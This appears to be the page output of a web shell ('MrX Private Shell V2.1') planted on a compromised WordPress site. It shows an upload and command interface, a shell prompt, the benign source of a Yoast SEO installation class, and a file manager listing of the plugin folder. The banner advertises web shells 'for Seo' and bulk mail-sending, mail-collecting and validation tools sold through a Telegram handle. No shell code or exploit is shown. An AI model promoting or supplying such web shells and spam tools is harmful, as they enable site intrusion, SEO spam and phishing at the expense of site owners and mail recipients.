__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * WPSEO plugin file.
 *
 * @package WPSEO\Internals
 * @since   3.6
 */

/**
 * This class checks if the wpseo option doesn't exists. In the case it doesn't it will set a property that is
 * accessible via a method to check if the installation is fresh.
 */
class WPSEO_Installation {

	/**
	 * Checks if Yoast SEO is installed for the first time.
	 */
	public function __construct() {
		$is_first_install = $this->is_first_install();

		if ( $is_first_install && WPSEO_Utils::is_api_available() ) {
			add_action( 'wpseo_activate', [ $this, 'set_first_install_options' ] );
		}
	}

	/**
	 * When the option doesn't exist, it should be a new install.
	 *
	 * @return bool
	 */
	private function is_first_install() {
		return ( get_option( 'wpseo' ) === false );
	}

	/**
	 * Sets the options on first install for showing the installation notice and disabling of the settings pages.
	 *
	 * @return void
	 */
	public function set_first_install_options() {
		$options = get_option( 'wpseo' );

		$options['show_onboarding_notice'] = true;
		$options['first_activated_on']     = time();

		update_option( 'wpseo', $options );
	}
}

Filemanager

Name Type Size Permission Actions
exceptions Folder 0775
options Folder 0775
sitemaps Folder 0775
class-addon-manager.php File 26.07 KB 0775
class-my-yoast-api-request.php File 4.78 KB 0775
class-post-type.php File 3.89 KB 0775
class-rewrite.php File 7.58 KB 0775
class-upgrade-history.php File 3.05 KB 0775
class-upgrade.php File 54.83 KB 0775
class-wpseo-admin-bar-menu.php File 26.54 KB 0775
class-wpseo-content-images.php File 2.62 KB 0775
class-wpseo-custom-fields.php File 1.72 KB 0775
class-wpseo-custom-taxonomies.php File 1.59 KB 0775
class-wpseo-image-utils.php File 15.09 KB 0775
class-wpseo-installation.php File 1.11 KB 0775
class-wpseo-meta.php File 34.14 KB 0775
class-wpseo-primary-term.php File 1.7 KB 0775
class-wpseo-rank.php File 7.37 KB 0775
class-wpseo-replace-vars.php File 51.4 KB 0775
class-wpseo-replacement-variable.php File 1.34 KB 0775
class-wpseo-shortlinker.php File 1.11 KB 0775
class-wpseo-statistics.php File 1.41 KB 0775
class-wpseo-utils.php File 28.53 KB 0775
class-yoast-dynamic-rewrites.php File 5.24 KB 0775
date-helper.php File 1.71 KB 0775
index.php File 38 B 0775
interface-wpseo-wordpress-ajax-integration.php File 294 B 0775
interface-wpseo-wordpress-integration.php File 348 B 0775
language-utils.php File 1.28 KB 0775
wpseo-functions-deprecated.php File 68 B 0775
wpseo-functions.php File 9 KB 0775
wpseo-non-ajax-functions.php File 1.56 KB 0775
Filemanager